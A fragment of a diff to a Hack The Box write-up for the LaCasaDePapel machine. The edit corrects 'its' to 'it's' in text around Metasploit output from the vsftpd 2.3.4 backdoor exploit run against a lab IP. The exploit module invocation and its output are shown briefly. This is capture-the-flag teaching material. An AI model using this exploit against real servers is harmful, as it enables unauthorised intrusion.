b4cksp4c3/b4cksp4c3.github.io/htb/writeups/lacasadepapel.md

 [*] 10.10.10.131:21 - USER: 331 Please specify the password.
 [*] Exploit completed, but no session was created.
 ```
 If we run the exploit a second time we get a different message.
-It says that the port for the backdoor is open but its not a shell which most likely means its not a bash shell.
+It says that the port for the backdoor is open but it's not a shell which most likely means it's not a bash shell.
 ```
 msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run